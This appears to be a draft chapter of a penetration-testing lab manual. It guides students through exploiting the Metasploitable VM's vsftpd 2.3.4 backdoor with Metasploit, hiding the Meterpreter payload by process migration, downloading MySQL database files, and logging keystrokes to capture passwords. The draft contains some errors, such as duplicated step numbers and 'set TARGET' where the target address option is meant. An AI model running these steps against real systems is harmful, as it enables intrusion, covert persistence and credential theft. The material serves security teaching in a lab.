Chapter 14 Metasploit

14.1 Background

Metasploit is a framework that is Developed by Rapid 7. This section we will walk throught the step that an attacker would take to use to break into webserver and database containing the passwords for the website.

14.2 Using Exploits

Step 1 Start up the metasploitable virtual machine. (This machine that will be webserver that we attack in the this excersize and get the IPaddress of metasploitable machine by logging in use username: msfadmin, password: msfadmin. And get the IPaddress by running the ifconfig command. Write it down you need to remember it for the next step.

[Include Screen Shot]

Step 2 Click on the Metasploit Icon [Include picture]

[Include screen shot Metasploit Console]

Step 3 Metasploit Framework is comprised of collection of modules. These modules contain code that is designed execute a particlar exploit. In this next labs we explore how the modules are implemented by implementing our own module for this lab we will use an existing module in metasploit. We will begin by loading the module that execute the ftp exploit module (This will execute the attack from 2 chapter)

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next you want to set the IP-address of the target that you want to attack.

set TARGET <target-id>

Step 4 Run the command below to use the exploit and upload the metasploit payload (Metrepreter):

exploit

[include screenshot ]

14.3 Hide metrepreter process by migrating it.

Once the hacker has upload a metasploitable payload they don’t the user to notice the process and kill it so often the hide the metrepreter process by migrating it.

Step 5 Get a list of the process by running the ps command ps [include screenshot]

Step 6 The process by migrating by running

migrate 682 [Update to match a process in the list]

14.4 Exploring the file system

Great now that you have ran the exploit and uploaded the metasploit payload you should have a reverse shell lets you exploire the file system on the webserver.

Step 5 Run the pwd command. Notice that it prints the current directory of the program.

[include screenshot]

Step 6 Navigate to directory containing the database file by running the following command

cd /var/lib/mysql/ [include screenshot]

Step 7 Download one of the database files by running the command below:

download [filename] [Include screen shot]

14.5 Key Logging

Great you have been able to sucesfully get the database file from the system. But you don’t know the admin password for the system. This would make really convient for login back into the system, an even other systems without creating to much noise.

Step 8 Install a keylogger so that you can collect the usernames and password from the system. By running the keyscan_start

[Include Screen shot]

Step 9 Test the keylogger by logging into the metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]

Step 7 Open the window containing the meterpeter session. Run the command `keyscan_dump. Notice anything? [Include screenshot below]